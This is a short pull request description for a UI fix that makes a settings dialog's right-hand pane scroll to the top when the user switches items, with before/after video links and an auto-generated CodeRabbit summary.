In the settings dialog, when switching between different setting items, the right-side content retains the previous scroll position. I think it would be better for the right side to return to the top every time a switch is made, so I submitted this PR. **before** https://github.com/user-attachments/assets/a2d10601-6173-41d3-8d68-6fbccc62aaa7 **after** https://github.com/user-attachments/assets/f240348b-e131-4703-8232-1a07e924162d <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Ensured the settings dialog always scrolls to the top when the settings state updates, improving user experience when navigating settings. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |